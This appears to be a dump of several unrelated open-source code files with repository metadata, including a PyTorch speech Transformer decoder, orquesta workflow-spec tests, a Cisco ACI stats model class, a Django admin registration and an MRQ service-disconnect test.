output, attn = layer(output, self_attn_mask)
return output
class SpeechTransformerDecoder(nn.Module):
"""
The TransformerDecoder is composed of a stack of N identical layers.
Each layer has three sub-layers. The first is a multi-head self-attention mechanism,
and the second is a multi-head attention mechanism, third is a feed-forward network.
Args:
num_classes: umber of classes
d_model: dimension of model
d_ff: dimension of feed forward network
num_layers: number of decoder layers
num_heads: number of attention heads
ffnet_style: style of feed forward network
dropout_p: probability of dropout
pad_id: identification of pad token
eos_id: identification of end of sentence token
"""
def __init__(
self,
num_classes: int, # number of classes
d_model: int = 512, # dimension of model
d_ff: int = 512, # dimension of feed forward network
num_layers: int = 6, # number of decoder layers
num_heads: int = 8, # number of attention heads
ffnet_style: str = 'ff', # style of feed forward network
dropout_p: float = 0.3, # probability of dropout
pad_id: int = 0, # identification of pad token
eos_id: int = 2 # identification of end of sentence token
) -> None:
super(SpeechTransformerDecoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.num_heads = num_heads
self.embedding = Embedding(num_classes, pad_id, d_model)
self.positional_encoding = PositionalEncoding(d_model)
self.input_dropout = nn.Dropout(p=dropout_p)
self.layers = nn.ModuleList([
SpeechTransformerDecoderLayer(d_model, num_heads, d_ff, dropout_p, ffnet_style) for _ in range(num_layers)
])
self.pad_id = pad_id
self.eos_id = eos_id
def forward(self, inputs: Tensor, input_lengths: Optional[Any] = None, memory: Tensor = None):
batch_size, output_length = inputs.size(0), inputs.size(1)
self_attn_mask = get_decoder_self_attn_mask(inputs, inputs, self.pad_id)
memory_mask = get_attn_pad_mask(memory, input_lengths, output_length)
output = self.input_dropout(self.embedding(inputs) + self.positional_encoding(inputs.size(1)))
for layer in self.layers:
output, self_attn, memory_attn = layer(output, memory, self_attn_mask, memory_mask)
return output
| [
"sh951011@gmail.com"
] | sh951011@gmail.com |
5eb503c79c974710bfb8cd6bb81664d03409cc35 | a0cbae33d175fdf0299eddc775a1b4b84c0addcf | /orquesta/tests/unit/utils/test_specs.py | 1fe005ff1a6149426c489f2b0933ba00ce4dc4d8 | [
"Apache-2.0"
] | permissive | batk0/orquesta | 240ff95c76c610c52518ee7d2e3eee11b6594a73 | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | refs/heads/master | 2020-04-17T10:48:48.016607 | 2019-01-19T15:40:05 | 2019-01-19T15:40:05 | 166,514,957 | 0 | 0 | Apache-2.0 | 2019-01-19T06:37:39 | 2019-01-19T06:37:39 | null | UTF-8 | Python | false | false | 3,302 | py | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
from orquesta.specs import loader
from orquesta.tests.unit import base
from orquesta.utils import specs
class SpecsUtilTest(base.WorkflowSpecTest):
def setUp(self):
super(SpecsUtilTest, self).setUp()
self.spec_module = loader.get_spec_module(self.spec_module_name)
def test_convert_wf_def_dict_to_spec(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
self.assertIsInstance(wf_def, dict)
wf_spec = specs.instantiate(self.spec_module_name, wf_def)
self.assertIsInstance(wf_spec, self.spec_module.WorkflowSpec)
self.assertEqual(wf_name, wf_spec.name)
self.assertDictEqual(wf_def[wf_name], wf_spec.spec)
def test_convert_wf_def_yaml_to_spec(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name, raw=True)
self.assertIsInstance(wf_def, str)
wf_spec = specs.instantiate(self.spec_module_name, wf_def)
self.assertIsInstance(wf_spec, self.spec_module.WorkflowSpec)
self.assertEqual(wf_name, wf_spec.name)
self.assertDictEqual(yaml.safe_load(wf_def)[wf_name], wf_spec.spec)
def test_bad_wf_def_none(self):
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
None
)
def test_bad_wf_def_empty(self):
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
dict()
)
def test_bad_wf_def_not_yaml(self):
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
'foobar'
)
def test_bad_wf_def_without_version(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
wf_def.pop('version')
self.assertIsNone(wf_def.get('version'))
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
wf_def
)
def test_bad_wf_def_unsupported_version(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
wf_def['version'] = 99.0
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
wf_def
)
def test_deserialize(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
wf_spec_1 = specs.instantiate(self.spec_module_name, wf_def)
wf_spec_2 = specs.deserialize(wf_spec_1.serialize())
self.assertIsInstance(wf_spec_2, self.spec_module.WorkflowSpec)
self.assertEqual(wf_name, wf_spec_2.name)
self.assertDictEqual(wf_def[wf_name], wf_spec_2.spec)
| [
"m4d.coder@gmail.com"
] | m4d.coder@gmail.com |
9e68300285589f45cadd6f6720d062cfc9398b77 | cd78bbe886469a745043a68524519379c5cbd850 | /main.py | b6abc887e73965bfc3a6a82706e47714dee11178 | [] | no_license | datacratic/mldb-dataset-loader | 0e875cc9e76f64c8e031ac0c8a813c2a062446b3 | 9849ac985b21391b23c0bc5b5341e4d7d6fc87d4 | refs/heads/master | 2021-01-21T11:10:59.718147 | 2015-09-21T23:44:01 | 2015-09-21T23:44:01 | 34,128,558 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | mldb.plugin.serve_static_folder('/static', 'static')
mldb.plugin.serve_documentation_folder('doc')
| [
"nicolas@datacratic.com"
] | nicolas@datacratic.com |
946fec7bf11af536f56d0e05551393f774b9cab7 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_interiors.py | c9fcc546f81fabbad76438e54f363fd59fe36da0 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _INTERIORS():
def __init__(self,):
self.name = "INTERIORS"
self.definitions = interior
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['interior']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
6950a4db338145fef4271f8842be1904ca01b521 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/2cb4a725b4cb9be160d194f7b47df6c98709ebfd-<modify_connection_vlan>-fix.py | e8d4005e4624800007efef4e9d9f7ed6b2b88e01 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | def modify_connection_vlan(self):
cmd = [self.nmcli_bin]
return cmd | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
90a333ab994fd0e2da8356e54f5d5a862032015c | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/l2/egrbytesag1w.py | 92f1aca335188b4a43df89b2e7f1eee85cdb2d9f | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 19,668 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class EgrBytesAg1w(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.l2.EgrBytesAg1w", "egress bytes")
counter = CounterMeta("multicast", CounterCategory.COUNTER, "bytes", "egress multicast bytes")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "multicastCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "multicastPer"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "multicastSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "multicastThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "multicastTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "multicastTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "multicastRate"
meta._counters.append(counter)
counter = CounterMeta("unicast", CounterCategory.COUNTER, "bytes", "egress unicast bytes")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "unicastCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "unicastPer"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "unicastSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "unicastThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "unicastTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "unicastTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "unicastRate"
meta._counters.append(counter)
meta.moClassName = "l2EgrBytesAg1w"
meta.rnFormat = "CDl2EgrBytesAg1w"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current aggregated egress bytes stats in 1 week"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.fv.Ap")
meta.parentClasses.add("cobra.model.vns.EPpInfo")
meta.parentClasses.add("cobra.model.fv.InBEpP")
meta.parentClasses.add("cobra.model.vns.SDEPpInfo")
meta.parentClasses.add("cobra.model.fv.TnlEPg")
meta.parentClasses.add("cobra.model.fv.RtdEpP")
meta.parentClasses.add("cobra.model.dhcp.PRelPg")
meta.parentClasses.add("cobra.model.fv.TnlEpP")
meta.parentClasses.add("cobra.model.fv.BrEpP")
meta.parentClasses.add("cobra.model.fv.AEPg")
meta.parentClasses.add("cobra.model.l2ext.InstP")
meta.parentClasses.add("cobra.model.vns.SHEPpInfo")
meta.parentClasses.add("cobra.model.l3ext.InstP")
meta.parentClasses.add("cobra.model.infra.PEPg")
meta.parentClasses.add("cobra.model.fv.InstPEpP")
meta.parentClasses.add("cobra.model.fv.OoBEpP")
meta.parentClasses.add("cobra.model.infra.CEPg")
meta.parentClasses.add("cobra.model.vns.REPpInfo")
meta.parentClasses.add("cobra.model.fv.SvcBD")
meta.parentClasses.add("cobra.model.mgmt.InB")
meta.parentClasses.add("cobra.model.fv.Tenant")
meta.parentClasses.add("cobra.model.fv.SvcEpP")
meta.parentClasses.add("cobra.model.fv.EpP")
meta.parentClasses.add("cobra.model.fv.BD")
meta.parentClasses.add("cobra.model.fv.Ctx")
meta.parentClasses.add("cobra.model.dhcp.CRelPg")
meta.parentClasses.add("cobra.model.l3ext.InstPDef")
meta.superClasses.add("cobra.model.l2.EgrBytesAg")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.stats.Item")
meta.rnPrefixes = [
('CDl2EgrBytesAg1w', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "multicastCum", "multicastCum", 21711, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "egress multicast bytes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastCum", prop)
prop = PropMeta("str", "multicastPer", "multicastPer", 21712, PropCategory.IMPLICIT_PERIODIC)
prop.label = "egress multicast bytes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastPer", prop)
prop = PropMeta("str", "multicastRate", "multicastRate", 21717, PropCategory.IMPLICIT_RATE)
prop.label = "egress multicast bytes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastRate", prop)
prop = PropMeta("str", "multicastSpct", "multicastSpct", 21713, PropCategory.IMPLICIT_SUSPECT)
prop.label = "egress multicast bytes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastSpct", prop)
prop = PropMeta("str", "multicastThr", "multicastThr", 21714, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "egress multicast bytes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("multicastThr", prop)
prop = PropMeta("str", "multicastTr", "multicastTr", 21716, PropCategory.IMPLICIT_TREND)
prop.label = "egress multicast bytes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastTr", prop)
prop = PropMeta("str", "multicastTrBase", "multicastTrBase", 21715, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "egress multicast bytes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastTrBase", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "unicastCum", "unicastCum", 21766, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "egress unicast bytes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastCum", prop)
prop = PropMeta("str", "unicastPer", "unicastPer", 21767, PropCategory.IMPLICIT_PERIODIC)
prop.label = "egress unicast bytes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastPer", prop)
prop = PropMeta("str", "unicastRate", "unicastRate", 21772, PropCategory.IMPLICIT_RATE)
prop.label = "egress unicast bytes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastRate", prop)
prop = PropMeta("str", "unicastSpct", "unicastSpct", 21768, PropCategory.IMPLICIT_SUSPECT)
prop.label = "egress unicast bytes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastSpct", prop)
prop = PropMeta("str", "unicastThr", "unicastThr", 21769, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "egress unicast bytes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("unicastThr", prop)
prop = PropMeta("str", "unicastTr", "unicastTr", 21771, PropCategory.IMPLICIT_TREND)
prop.label = "egress unicast bytes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastTr", prop)
prop = PropMeta("str", "unicastTrBase", "unicastTrBase", 21770, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "egress unicast bytes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastTrBase", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("ATgToGraphInst", "Graph Instances", "cobra.model.vns.GraphInst"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("AEPgToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ApToNwIf", "Application Profile to Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("InBToNode", "Node", "cobra.model.fv.Locale"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("EPgToNwIf", "Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtxToNwIf", "Private Network to Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("BDToNwIf", "Bridge Domain to Interface", "cobra.model.nw.If"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
4332107881083ad19cbe16942b26916ed9a854ca | e837db39c9609830ab8e77dac2077ea30cadc5b3 | /flachdaecher_app/admin.py | 6e3bb183ee3a1257841989b66c3583d79a1ad334 | [] | no_license | windundschnee/accountneu | 9c8ff1507f725a5179604be2640d76b5302a0299 | da9066840a312a95bc628556c94738010787a01f | refs/heads/master | 2022-12-10T06:00:42.449898 | 2019-10-25T18:29:23 | 2019-10-25T18:29:23 | 211,513,631 | 0 | 0 | null | 2022-12-08T05:22:15 | 2019-09-28T14:34:00 | Python | UTF-8 | Python | false | false | 133 | py | from django.contrib import admin
from .models import FlachdachModel
# Register your models here.
admin.site.register(FlachdachModel)
| [
"du@example.com"
] | du@example.com |
789d8aa33c6611b381c958efe2909d5a1a4e8aa4 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/edabit/_Edabit-Solutions-master/Find the Smallest and Biggest Numbers/solution.py | b9e343dc2a0a5a983bdba5cf2f792491328f77c8 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 315 | py | def min_max(nums):
nums.sort()
return [nums[0],nums[-1]]
def test():
print("test has started")
a_list = [14, 35, 6, 1, 34, 54]
if min_max(a_list) != [1,54]:
print("error1")
b_list = [1.346, 1.6532, 1.8734, 1.8723]
if min_max(b_list) != [1.346, 1.8734]:
print("error2")
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
5c1a337df0beee9fac92eb02290fbd2e49914b66 | 013432251ee6dc31f505ff0a9e0432ef7b552064 | /int3/errors.py | 334a3ab88c1e7e362b442a0c0476caf7797fb069 | [
"MIT"
] | permissive | Mic92/int3 | 7bb0d16f5488c7cbade576f9f22e6f11c83b6096 | 6057ddd7db9b5ae6c78429da983a0cd5e3686216 | refs/heads/master | 2020-03-26T16:14:04.955426 | 2018-08-22T23:19:29 | 2018-08-22T23:19:29 | 145,089,128 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | class Int3Error(Exception):
pass
| [
"joerg@thalheim.io"
] | joerg@thalheim.io |
8ff2d9f8ee57060f9e9421080728a6c5e92faa98 | e3abbb5790aac835330b0c2fe59eacc6765ae3cc | /tests/test_disconnects.py | 89b70530832b842d8df631c32c8724c4928950e6 | [
"MIT"
] | permissive | frankrousseau/mrq | 3d9433c809735666208edc532451dbba87f3d40c | 3c9c34f0df1de067c713be6f2d38eff8f923e03b | refs/heads/master | 2021-01-18T05:59:34.727873 | 2015-02-04T14:30:03 | 2015-02-04T14:30:03 | 30,272,780 | 0 | 0 | null | 2015-02-04T00:36:14 | 2015-02-04T00:36:13 | null | UTF-8 | Python | false | false | 892 | py | import time
from mrq.job import Job
import pytest
@pytest.mark.parametrize(["p_service"], [["mongodb"], ["redis"]])
def test_disconnects_service_during_task(worker, p_service):
""" Test what happens when mongodb disconnects during a job
"""
worker.start()
if p_service == "mongodb":
service = worker.fixture_mongodb
elif p_service == "redis":
service = worker.fixture_redis
service_pid = service.process.pid
job_id1 = worker.send_task("tests.tasks.general.Add", {
"a": 41, "b": 1, "sleep": 5}, block=False, queue="default")
time.sleep(2)
service.stop()
service.start()
service_pid2 = service.process.pid
# Make sure we did restart
assert service_pid != service_pid2
time.sleep(5)
# Result should be there without issues
assert Job(job_id1).fetch().data["result"] == 42
| [
"sylvain@sylvainzimmer.com"
] | sylvain@sylvainzimmer.com |
a738b72a044dabd2ea0da78eb4fb5e20d79f0280 | 19236d9e966cf5bafbe5479d613a175211e1dd37 | /cohesity_management_sdk/models/hyper_flex_storae_snapshot.py | be7bd6f758fcf271342c9f9ffb251ae480b2b9b7 | [
"MIT"
